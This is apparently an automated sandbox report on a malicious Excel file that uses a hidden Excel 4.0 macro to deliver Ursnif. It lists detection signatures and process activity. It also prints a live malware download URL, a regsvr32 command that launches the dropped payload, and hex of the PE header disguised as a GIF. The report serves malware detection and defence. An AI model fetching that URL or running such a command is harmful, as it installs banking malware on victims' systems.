Loading ...

Play interactive tourEdit tour

Analysis Report Rrapporto.xlsb

Overview

General Information

Sample Name:Rrapporto.xlsb
Analysis ID:316011
MD5:4dddb0320eac6050d6360c92c104d05c
SHA1:816db7af62de3dc200b88357a5341c6ce184cc93
SHA256:ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5716 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 1620 cmdline: regsvr32 -s C:\ProgramData\Dori.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5104 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5900 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1296 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5428 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 2856 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4676 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4176 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5492 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4476 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1056 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 29 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\ProgramData\Dori.ocx, CommandLine: regsvr32 -s C:\ProgramData\Dori.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5716, ProcessCommandLine: regsvr32 -s C:\ProgramData\Dori.ocx, ProcessId: 1620

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://45.138.72.84/10.11nov322.gifAvira URL Cloud: Label: malware
            Source: http://45.138.72.84/10.11nov322.gifAvira URL Cloud: Label: malware
            Source: 1.2.regsvr32.exe.320000.1.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 1.2.regsvr32.exe.320000.1.unpackAvira: Label: TR/Patched.Ren.Gen

            Software Vulnerabilities:

            barindex
            Document exploit detected (drops PE files)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 10.11nov322[1].gif.0.drJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 10.11nov322[1].gif.0.drJump to dropped file
            Document exploit detected (UrlDownloadToFile)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileAJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileAJump to behavior
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Downloads files with wrong headers with respect to MIME Content-TypeShow sources
            Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:52 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:52 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Nov 2020 13:07:52 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 13 Nov 2020 08:48:47 GMTETag: "23400-5b3f918bfb9c0"Accept-Ranges: bytesContent-Length: 144384Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Nov 2020 13:07:52 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 13 Nov 2020 08:48:47 GMTETag: "23400-5b3f918bfb9c0"Accept-Ranges: bytesContent-Length: 144384Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
